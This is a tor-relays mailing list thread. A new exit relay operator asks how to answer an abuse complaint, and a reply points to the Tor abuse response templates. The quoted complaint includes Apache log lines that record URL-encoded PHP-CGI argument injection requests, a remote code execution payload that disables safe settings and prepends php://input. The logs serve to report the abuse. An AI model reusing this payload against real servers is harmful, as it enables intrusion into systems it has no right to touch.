[Author Prev][Author Next][Thread Prev][Thread Next][Author Index][Thread Index]

Re: [tor-relays] Handling abuse - like to get your help please



Hello,

I generally respond using the templates on this page: https://trac.torproject.org/projects/tor/wiki/TheOnionRouter/TorAbuseTemplates.

Generally the abuser has already stopped or is connected to a new exit node by the time you get a message.

Hope that helps!
-- 
Michael Canning
President - CaveFox Technology Corporation
mcanning@xxxxxxxxxxx

17. Jun 2016 15:35 by pa011@xxxxxx:

As I am new to this business could somebody please give me a hint how to
best handle such an abuse complain - possibly stop it?

Thanks, Regards and a nice weekend.


we have detected abuse from the IP address xxx.xxx.xxx,xxx, which
according to a
whois lookup is on your network. We would appreciate if you would
investigate
and take action as appropriate.

Log lines are given below, but please ask if you require any further
information.

If you are not the correct person to contact about this please accept
our apologies -
your e-mail address was extracted from the whois record by an automated
process.
This mail was automatically generated.

Note: Local timezone is +0200 (CEST)

/var/log/apache2/access.log:xxx.xxx.xxx.xxx - - [17/Jun/2016:09:25:50
+0200] "POST
/cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
HTTP/1.1" 404 293 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X)
AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d
Safari/8536.25"
/var/log/apache2/access.log:xxx.xxx.xxx.xxx - - [17/Jun/2016:09:25:51
+0200] "POST
/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
HTTP/1.1" 404 293 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X)
AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d
Safari/8536.25"
/var/log/apache2/access.log:xxx.xxx.xxx.xxx - - [17/Jun/2016:09:25:52
+0200] "POST
/cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
HTTP/1.1" 404 290 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X)
AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d
Safari/8536.25"
_______________________________________________
tor-relays mailing list
tor-relays@xxxxxxxxxxxxxxxxxxxx
https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-relays